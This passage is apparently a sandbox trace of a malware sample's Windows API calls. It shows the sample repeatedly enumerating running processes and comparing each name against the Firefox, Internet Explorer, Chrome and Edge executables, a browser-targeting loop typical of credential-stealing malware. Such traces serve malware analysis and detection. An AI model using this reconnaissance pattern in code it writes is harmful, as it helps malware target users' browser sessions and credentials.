th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.413] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.413] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.413] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.413] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.413] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0248.414] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0248.414] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0248.414] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0248.414] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.414] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.414] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.414] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.414] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.414] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.414] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0248.415] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0248.415] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0248.415] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0248.415] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.415] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.415] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0248.416] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0248.416] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0248.416] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.416] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0248.416] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0248.416] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0248.416] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0248.416] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.416] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.417] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0248.417] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0248.417] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0248.417] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.417] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.417] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0248.417] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0248.417] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0248.417] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.417] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.418] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0248.418] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0248.418] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0248.418] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.418] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.418] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0248.418] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0248.418] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0248.418] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.418] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.419] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0248.419] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0248.419] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0248.419] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.419] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0248.419] CloseHandle (hObject=0xd4) returned 1 [0248.420] Sleep (dwMilliseconds=0x3e8) [0249.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0249.423] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.423] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0249.424] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0249.424] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0249.424] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0249.424] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0249.424] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0249.424] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0249.424] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0249.424] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0249.424] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0249.425] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0249.425] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0249.425] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0249.425] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.425] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.425] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0249.425] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0249.425] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0249.425] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.425] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0249.426] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0249.426] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0249.426] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0249.426] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.426] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.426] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0249.426] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0249.426] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0249.426] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.427] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0249.427] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0249.427] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0249.427] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0249.427] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.427] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0249.428] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0249.428] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0249.428] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0249.428] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.428] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0249.428] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0249.428] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0249.428] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0249.428] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.428] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0249.429] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0249.429] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0249.429] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0249.429] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.429] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.429] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.429] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.429] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.429] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.429] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.430] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.430] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.430] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.430] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.430] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.430] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.430] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.430] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.430] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.431] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.431] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.431] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.431] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.431] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.431] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.432] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.432] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.432] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.432] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.432] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0249.432] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0249.432] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0249.432] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0249.432] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.432] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.433] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.433] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.433] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.433] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.433] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.433] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.433] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.433] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.433] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.433] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0249.434] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0249.434] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0249.434] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0249.434] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.434] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0249.434] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0249.434] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0249.435] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0249.435] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.435] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0249.435] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0249.435] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0249.435] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0249.435] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.435] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.436] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.436] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.436] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.436] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.436] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0249.436] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0249.436] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0249.436] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0249.436] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.436] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0249.437] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0249.437] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0249.437] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0249.437] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.437] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0249.438] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0249.438] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0249.438] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0249.438] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.438] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0249.438] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0249.438] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0249.438] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0249.438] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.438] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0249.439] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0249.439] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0249.439] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0249.439] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.439] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0249.439] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0249.439] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0249.439] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0249.439] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.439] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0249.440] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0249.440] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0249.440] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0249.440] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.440] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, 